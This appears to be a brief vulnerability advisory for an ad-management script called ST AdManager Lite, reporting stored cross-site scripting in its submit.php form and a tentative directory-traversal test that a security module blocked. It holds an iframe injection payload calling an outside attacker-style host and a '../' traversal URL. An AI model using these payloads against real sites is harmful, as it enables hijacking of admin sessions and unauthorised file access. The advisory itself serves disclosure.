ST AdManager Lite v1
Effected files:
submit.php input form
XSS Vulnerabilities:
submit.php input forms do not correctly sanatize user input before submitting it to be checked by an admin and then published. This in turn to allow a user to execute a XSS attack.
in asan admin and check the article.
PoC: [iframe src=http://evilsite.com/scriptlet.html [
Possible Directory traversal?:
The url below when tested produced a script action blocked msg from PHPSecurex, due to it being installed on the test server. I'll assume /../../../../ must be SecFiltered in mod_security.
ERROR MSG: The requested URL /index.php?id=/../../../../ contains a script or action that has has been deteremined unsafe. It has been disabled to prevent abuse.
This server protected by: SecurePHPx
Apache/1.3.34 Server at www.example.com Port 80